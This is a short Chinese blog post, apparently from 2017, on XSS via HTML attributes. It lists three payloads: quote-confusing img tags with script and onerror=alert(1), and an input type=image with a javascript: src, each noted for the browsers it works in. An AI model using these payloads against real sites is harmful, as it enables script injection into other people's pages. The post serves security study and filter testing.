HTML属性XSS
Aryb1n
3月 30, 2017
这两种payload看起来js都在引号里,但确实能跑,给跪了
<img src="x` ` <script>alert(1)</script>"` `> <!-- IE -->
<img src= alt=" onerror=alert(1) //"> <!-- IE FF Chrome-->
补一个不常用的
<input type="image" src="javascript: alert('xss');">